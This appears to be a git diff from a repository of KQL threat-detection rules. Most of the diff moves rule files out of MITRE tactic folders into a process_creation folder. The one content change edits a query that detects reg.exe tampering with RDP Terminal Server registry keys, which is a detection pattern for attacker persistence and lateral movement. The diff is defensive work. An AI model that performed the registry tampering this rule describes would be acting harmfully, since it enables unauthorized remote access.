diff --git a/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql b/KQL/rules/windows/process_creation/potential_file_download_via_ms_appinstaller_protocol_handler.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql rename to KQL/rules/windows/process_creation/potential_file_download_via_ms_appinstaller_protocol_handler.kql diff --git a/KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql b/KQL/rules/windows/process_creation/potential_file_overwrite_via_sysinternals_sdelete.kql similarity index 100% rename from KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql rename to KQL/rules/windows/process_creation/potential_file_overwrite_via_sysinternals_sdelete.kql diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql b/KQL/rules/windows/process_creation/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql rename to KQL/rules/windows/process_creation/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql b/KQL/rules/windows/process_creation/potential_homoglyph_attack_using_lookalike_characters.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql rename to KQL/rules/windows/process_creation/potential_homoglyph_attack_using_lookalike_characters.kql 
diff --git a/KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql b/KQL/rules/windows/process_creation/potential_lateral_movement_via_windows_remote_shell.kql similarity index 100% rename from KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql rename to KQL/rules/windows/process_creation/potential_lateral_movement_via_windows_remote_shell.kql diff --git a/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql b/KQL/rules/windows/process_creation/potential_lethalhta_technique_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql rename to KQL/rules/windows/process_creation/potential_lethalhta_technique_execution.kql diff --git a/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql b/KQL/rules/windows/process_creation/potential_lsass_process_dump_via_procdump.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql rename to KQL/rules/windows/process_creation/potential_lsass_process_dump_via_procdump.kql diff --git a/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql b/KQL/rules/windows/process_creation/potential_manage_bde_wsf_abuse_to_proxy_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql rename to KQL/rules/windows/process_creation/potential_manage_bde_wsf_abuse_to_proxy_execution.kql diff --git a/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql b/KQL/rules/windows/process_creation/potential_memory_dumping_activity_via_livekd.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql rename to KQL/rules/windows/process_creation/potential_memory_dumping_activity_via_livekd.kql 
diff --git a/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql b/KQL/rules/windows/process_creation/potential_meterpreter_cobaltstrike_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql rename to KQL/rules/windows/process_creation/potential_meterpreter_cobaltstrike_activity.kql diff --git a/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql b/KQL/rules/windows/process_creation/potential_mftrace_exe_abuse.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql rename to KQL/rules/windows/process_creation/potential_mftrace_exe_abuse.kql diff --git a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql b/KQL/rules/windows/process_creation/potential_mpclient_dll_sideloading_via_defender_binaries.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql rename to KQL/rules/windows/process_creation/potential_mpclient_dll_sideloading_via_defender_binaries.kql diff --git a/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql b/KQL/rules/windows/process_creation/potential_msiexec_masquerading.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql rename to KQL/rules/windows/process_creation/potential_msiexec_masquerading.kql diff --git a/KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql b/KQL/rules/windows/process_creation/potential_mstsc_shadowing_activity.kql similarity index 100% rename from KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql rename to KQL/rules/windows/process_creation/potential_mstsc_shadowing_activity.kql 
diff --git a/KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql b/KQL/rules/windows/process_creation/potential_network_sniffing_activity_using_network_tools.kql similarity index 100% rename from KQL/rules/Credential Access/potential_network_sniffing_activity_using_network_tools.kql rename to KQL/rules/windows/process_creation/potential_network_sniffing_activity_using_network_tools.kql diff --git a/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql b/KQL/rules/windows/process_creation/potential_ntlm_coercion_via_certutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql rename to KQL/rules/windows/process_creation/potential_ntlm_coercion_via_certutil_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql b/KQL/rules/windows/process_creation/potential_obfuscated_ordinal_call_via_rundll32.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql rename to KQL/rules/windows/process_creation/potential_obfuscated_ordinal_call_via_rundll32.kql diff --git a/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql b/KQL/rules/windows/process_creation/potential_password_spraying_attempt_using_dsacls_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql rename to KQL/rules/windows/process_creation/potential_password_spraying_attempt_using_dsacls_exe.kql 
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql b/KQL/rules/windows/process_creation/potential_persistence_attempt_via_existing_service_tampering.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql rename to KQL/rules/windows/process_creation/potential_persistence_attempt_via_existing_service_tampering.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql b/KQL/rules/windows/process_creation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql rename to KQL/rules/windows/process_creation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql b/KQL/rules/windows/process_creation/potential_persistence_via_logon_scripts_commandline.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql rename to KQL/rules/windows/process_creation/potential_persistence_via_logon_scripts_commandline.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql b/KQL/rules/windows/process_creation/potential_persistence_via_microsoft_compatibility_appraiser.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql rename to KQL/rules/windows/process_creation/potential_persistence_via_microsoft_compatibility_appraiser.kql 
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql b/KQL/rules/windows/process_creation/potential_persistence_via_netsh_helper_dll.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql rename to KQL/rules/windows/process_creation/potential_persistence_via_netsh_helper_dll.kql diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql b/KQL/rules/windows/process_creation/potential_persistence_via_powershell_search_order_hijacking_task.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql rename to KQL/rules/windows/process_creation/potential_persistence_via_powershell_search_order_hijacking_task.kql diff --git a/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/windows/process_creation/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql similarity index 100% rename from KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql rename to KQL/rules/windows/process_creation/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql diff --git a/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql b/KQL/rules/windows/process_creation/potential_powershell_command_line_obfuscation.kql similarity index 100% rename from KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql rename to KQL/rules/windows/process_creation/potential_powershell_command_line_obfuscation.kql 
diff --git a/KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql b/KQL/rules/windows/process_creation/potential_powershell_console_history_access_attempt_via_history_file.kql similarity index 100% rename from KQL/rules/Credential Access/potential_powershell_console_history_access_attempt_via_history_file.kql rename to KQL/rules/windows/process_creation/potential_powershell_console_history_access_attempt_via_history_file.kql diff --git a/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql b/KQL/rules/windows/process_creation/potential_powershell_downgrade_attack.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql rename to KQL/rules/windows/process_creation/potential_powershell_downgrade_attack.kql diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql b/KQL/rules/windows/process_creation/potential_powershell_execution_policy_tampering_proccreation.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql rename to KQL/rules/windows/process_creation/potential_powershell_execution_policy_tampering_proccreation.kql diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql b/KQL/rules/windows/process_creation/potential_powershell_execution_via_dll.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql rename to KQL/rules/windows/process_creation/potential_powershell_execution_via_dll.kql 
diff --git a/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql b/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_reversed_commands.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql rename to KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_reversed_commands.kql diff --git a/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql b/KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_wchar_char.kql similarity index 100% rename from KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql rename to KQL/rules/windows/process_creation/potential_powershell_obfuscation_via_wchar_char.kql diff --git a/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql b/KQL/rules/windows/process_creation/potential_powershell_reverseshell_connection.kql similarity index 100% rename from KQL/rules/Execution/potential_powershell_reverseshell_connection.kql rename to KQL/rules/windows/process_creation/potential_powershell_reverseshell_connection.kql diff --git a/KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql b/KQL/rules/windows/process_creation/potential_privilege_escalation_to_local_system.kql similarity index 100% rename from KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql rename to KQL/rules/windows/process_creation/potential_privilege_escalation_to_local_system.kql 
diff --git a/KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql b/KQL/rules/windows/process_creation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql rename to KQL/rules/windows/process_creation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql diff --git a/KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql b/KQL/rules/windows/process_creation/potential_privilege_escalation_via_service_permissions_weakness.kql similarity index 100% rename from KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql rename to KQL/rules/windows/process_creation/potential_privilege_escalation_via_service_permissions_weakness.kql diff --git a/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql b/KQL/rules/windows/process_creation/potential_process_execution_proxy_via_cl_invocation_ps1.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql rename to KQL/rules/windows/process_creation/potential_process_execution_proxy_via_cl_invocation_ps1.kql diff --git a/KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql b/KQL/rules/windows/process_creation/potential_process_injection_via_msra_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql rename to KQL/rules/windows/process_creation/potential_process_injection_via_msra_exe.kql 
diff --git a/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_product_class_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/potential_product_class_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_product_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/potential_product_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql b/KQL/rules/windows/process_creation/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql rename to KQL/rules/windows/process_creation/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql diff --git a/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql b/KQL/rules/windows/process_creation/potential_provlaunch_exe_binary_proxy_execution_abuse.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql rename to KQL/rules/windows/process_creation/potential_provlaunch_exe_binary_proxy_execution_abuse.kql diff --git a/KQL/rules/Resource Development/potential_psexec_remote_execution.kql b/KQL/rules/windows/process_creation/potential_psexec_remote_execution.kql similarity index 100% rename from KQL/rules/Resource Development/potential_psexec_remote_execution.kql rename to KQL/rules/windows/process_creation/potential_psexec_remote_execution.kql 
diff --git a/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql b/KQL/rules/windows/process_creation/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql rename to KQL/rules/windows/process_creation/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql diff --git a/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql b/KQL/rules/windows/process_creation/potential_rdp_session_hijacking_activity.kql similarity index 100% rename from KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql rename to KQL/rules/windows/process_creation/potential_rdp_session_hijacking_activity.kql diff --git a/KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql b/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_plink.kql similarity index 100% rename from KQL/rules/Command and Control/potential_rdp_tunneling_via_plink.kql rename to KQL/rules/windows/process_creation/potential_rdp_tunneling_via_plink.kql diff --git a/KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql b/KQL/rules/windows/process_creation/potential_rdp_tunneling_via_ssh.kql similarity index 100% rename from KQL/rules/Command and Control/potential_rdp_tunneling_via_ssh.kql rename to KQL/rules/windows/process_creation/potential_rdp_tunneling_via_ssh.kql diff --git a/KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql b/KQL/rules/windows/process_creation/potential_recon_activity_using_driverquery_exe.kql similarity index 100% rename from KQL/rules/Discovery/potential_recon_activity_using_driverquery_exe.kql rename to KQL/rules/windows/process_creation/potential_recon_activity_using_driverquery_exe.kql 
diff --git a/KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql b/KQL/rules/windows/process_creation/potential_recon_activity_via_nltest_exe.kql similarity index 100% rename from KQL/rules/Discovery/potential_recon_activity_via_nltest_exe.kql rename to KQL/rules/windows/process_creation/potential_recon_activity_via_nltest_exe.kql diff --git a/KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/windows/process_creation/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql similarity index 100% rename from KQL/rules/Discovery/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql rename to KQL/rules/windows/process_creation/potential_reconnaissance_activity_via_gathernetworkinfo_vbs.kql diff --git a/KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql b/KQL/rules/windows/process_creation/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql similarity index 100% rename from KQL/rules/Credential Access/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql rename to KQL/rules/windows/process_creation/potential_reconnaissance_for_cached_credentials_via_cmdkey_exe.kql diff --git a/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql b/KQL/rules/windows/process_creation/potential_reflectdebugger_content_execution_via_werfault_exe.kql similarity index 100% rename from KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql rename to KQL/rules/windows/process_creation/potential_reflectdebugger_content_execution_via_werfault_exe.kql 
diff --git a/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql b/KQL/rules/windows/process_creation/potential_register_app_vbs_lolscript_abuse.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql rename to KQL/rules/windows/process_creation/potential_register_app_vbs_lolscript_abuse.kql diff --git a/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql b/KQL/rules/windows/process_creation/potential_regsvr32_commandline_flag_anomaly.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql rename to KQL/rules/windows/process_creation/potential_regsvr32_commandline_flag_anomaly.kql diff --git a/KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql b/KQL/rules/windows/process_creation/potential_remote_desktop_tunneling.kql similarity index 100% rename from KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql rename to KQL/rules/windows/process_creation/potential_remote_desktop_tunneling.kql diff --git a/KQL/rules/Execution/potential_renamed_rundll32_execution.kql b/KQL/rules/windows/process_creation/potential_renamed_rundll32_execution.kql similarity index 100% rename from KQL/rules/Execution/potential_renamed_rundll32_execution.kql rename to KQL/rules/windows/process_creation/potential_renamed_rundll32_execution.kql diff --git a/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql b/KQL/rules/windows/process_creation/potential_rundll32_execution_with_dll_stored_in_ads.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql rename to KQL/rules/windows/process_creation/potential_rundll32_execution_with_dll_stored_in_ads.kql 
diff --git a/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql b/KQL/rules/windows/process_creation/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql rename to KQL/rules/windows/process_creation/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql diff --git a/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql b/KQL/rules/windows/process_creation/potential_shelldispatch_dll_functionality_abuse.kql similarity index 100% rename from KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql rename to KQL/rules/windows/process_creation/potential_shelldispatch_dll_functionality_abuse.kql diff --git a/KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql b/KQL/rules/windows/process_creation/potential_shim_database_persistence_via_sdbinst_exe.kql similarity index 100% rename from KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql rename to KQL/rules/windows/process_creation/potential_shim_database_persistence_via_sdbinst_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql b/KQL/rules/windows/process_creation/potential_signing_bypass_via_windows_developer_features.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql rename to KQL/rules/windows/process_creation/potential_signing_bypass_via_windows_developer_features.kql diff --git a/KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql b/KQL/rules/windows/process_creation/potential_smb_relay_attack_tool_execution.kql similarity index 100% rename from KQL/rules/Collection/potential_smb_relay_attack_tool_execution.kql rename to KQL/rules/windows/process_creation/potential_smb_relay_attack_tool_execution.kql 
diff --git a/KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql b/KQL/rules/windows/process_creation/potential_spn_enumeration_via_setspn_exe.kql similarity index 100% rename from KQL/rules/Credential Access/potential_spn_enumeration_via_setspn_exe.kql rename to KQL/rules/windows/process_creation/potential_spn_enumeration_via_setspn_exe.kql diff --git a/KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql b/KQL/rules/windows/process_creation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql rename to KQL/rules/windows/process_creation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql diff --git a/KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql b/KQL/rules/windows/process_creation/potential_suspicious_activity_using_secedit.kql similarity index 100% rename from KQL/rules/Collection/potential_suspicious_activity_using_secedit.kql rename to KQL/rules/windows/process_creation/potential_suspicious_activity_using_secedit.kql diff --git a/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql b/KQL/rules/windows/process_creation/potential_suspicious_browser_launch_from_document_reader_process.kql similarity index 100% rename from KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql rename to KQL/rules/windows/process_creation/potential_suspicious_browser_launch_from_document_reader_process.kql diff --git a/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql b/KQL/rules/windows/process_creation/potential_suspicious_mofcomp_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql rename to KQL/rules/windows/process_creation/potential_suspicious_mofcomp_execution.kql 
diff --git a/KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql b/KQL/rules/windows/process_creation/potential_suspicious_registry_file_imported_via_reg_exe.kql similarity index 100% rename from KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql rename to KQL/rules/windows/process_creation/potential_suspicious_registry_file_imported_via_reg_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql b/KQL/rules/windows/process_creation/potential_suspicious_windows_feature_enabled_proccreation.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql rename to KQL/rules/windows/process_creation/potential_suspicious_windows_feature_enabled_proccreation.kql diff --git a/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql b/KQL/rules/windows/process_creation/potential_sysinternals_procdump_evasion.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql rename to KQL/rules/windows/process_creation/potential_sysinternals_procdump_evasion.kql diff --git a/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql b/KQL/rules/windows/process_creation/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql similarity index 55% rename from KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql rename to KQL/rules/windows/process_creation/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql index e5791364..5c771af8 100644 --- a/KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql +++ b/KQL/rules/windows/process_creation/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql 
@@ -7,4 +7,4 @@ // Tags: attack.persistence, attack.defense-evasion, attack.lateral-movement, attack.t1021.001, attack.t1112 DeviceProcessEvents -| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "fDenyTSConnections")) \ No newline at end of file +| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fDenyTSConnections" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "SecurityLayer" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains 
"TSAppCompat" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "WinStations\\RDP-Tcp")) and (not((ProcessCommandLine contains "SecurityLayer" and ProcessCommandLine contains "02"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql b/KQL/rules/windows/process_creation/potential_tampering_with_security_products_via_wmic.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_tampering_with_security_products_via_wmic.kql rename to KQL/rules/windows/process_creation/potential_tampering_with_security_products_via_wmic.kql diff --git a/KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql b/KQL/rules/windows/process_creation/potential_uac_bypass_via_sdclt_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql rename to KQL/rules/windows/process_creation/potential_uac_bypass_via_sdclt_exe.kql diff --git a/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql b/KQL/rules/windows/process_creation/potential_winapi_calls_via_commandline.kql similarity index 100% rename from KQL/rules/Execution/potential_winapi_calls_via_commandline.kql rename to KQL/rules/windows/process_creation/potential_winapi_calls_via_commandline.kql 
diff --git a/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql b/KQL/rules/windows/process_creation/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql similarity index 100% rename from KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql rename to KQL/rules/windows/process_creation/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql diff --git a/KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_windows_defender_tampering_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_windows_defender_tampering_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/potential_windows_defender_tampering_via_wmic_exe.kql diff --git a/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql b/KQL/rules/windows/process_creation/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql similarity index 100% rename from KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql rename to KQL/rules/windows/process_creation/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql diff --git a/KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql b/KQL/rules/windows/process_creation/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql rename to KQL/rules/windows/process_creation/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql 
